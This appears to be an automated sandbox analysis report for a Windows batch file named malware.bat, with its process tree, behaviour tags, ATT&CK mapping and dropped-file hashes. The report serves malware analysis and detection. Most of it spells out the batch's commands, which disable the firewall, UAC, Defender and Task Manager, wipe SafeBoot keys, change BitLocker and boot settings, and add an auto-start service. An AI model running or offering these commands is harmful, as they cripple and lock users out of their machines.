C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5400,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5408 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5428,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5964,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5808,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6208 /prefetch:81⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3fc 0x5181⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6440,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6444,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6844,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6608,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=6684 /prefetch:11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "GYLQWJCN$"2⤵
-
C:\Windows\system32\net.exenet user "GYLQWJCN$"3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38fb055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
System Services
1Service Execution
1Command and Scripting Interpreter
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.dbFilesize
1024KB
MD594194e2fa69ff276dc002efb0f8abcb6
SHA1701f2598e03e52079e6cdc7447b0599074cd0b16
SHA256b7c138f85c20298bdffca80a05ce874ee1456093b003a88c839031f2f21549cc
SHA512ee89547299c1c9b0bc9288872cde385ebe60195444644551290a660bc7471802b7ace97565bfcde6d525e84aed05727855ef49b97c27d38403490a4ca4f677a5
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
7KB
MD583d0f9f348182309763ee1ccf371bfc6
SHA11bdeab33c57933dcdc7aeebde33daf840278a43f
SHA2564ec103ac2a883e56fa40b536de331ddf1431a3937e7aa54b2b1cbc3c912e16f6
SHA5127a06900f29fbde70dde1105a538ec60d5aca4cccaa70e55880365615daf8a4eb5d7e51abe6a96a45103bd8f86aafe9044eada9732095b04d6e873d83fabd597d